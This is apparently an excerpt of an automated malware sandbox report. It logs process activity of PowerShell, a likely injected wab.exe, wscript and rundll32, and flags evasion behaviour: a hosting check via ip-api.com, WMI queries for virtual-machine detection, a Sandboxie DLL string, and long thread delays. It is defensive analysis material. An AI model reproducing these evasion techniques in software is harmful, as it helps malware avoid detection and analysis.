            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Check if machine is in data center or colocation facility
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: wab.exe, 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 2570000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 22E30000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 22C70000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5721Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4183Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6290Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3519Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3561Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 6277Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7092Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784Thread sleep count: 6290 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784Thread sleep count: 3519 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6740Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -24903104499507879s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6488Thread sleep count: 3561 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -99875s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -99765s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6488Thread sleep count: 6277 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -99656s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -99544s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -99437s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -99328s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -99219s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -99109s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -99000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -98886s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -98778s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -98672s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -98562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -98453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -98341s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -98233s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -98125s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -98015s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -97906s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -97797s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -97687s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -97578s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -97468s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -97359s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -97250s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -97140s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -97031s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -96921s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -96801s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -96672s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -96562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -96442s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -96312s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -96202s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -96094s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -95969s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -95859s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -95740s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -95609s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -95500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -95390s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -95281s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -95171s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -95062s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -94953s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -94844s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -94734s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -94625s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6464Thread sleep time: -94515s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99765Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99656Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99544Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99219Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98886Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98778Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98341Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98233Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98125Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98015Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97906Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97797Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97687Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97578Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97468Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97359Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97250Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97140Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97031Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96921Jump to behavior
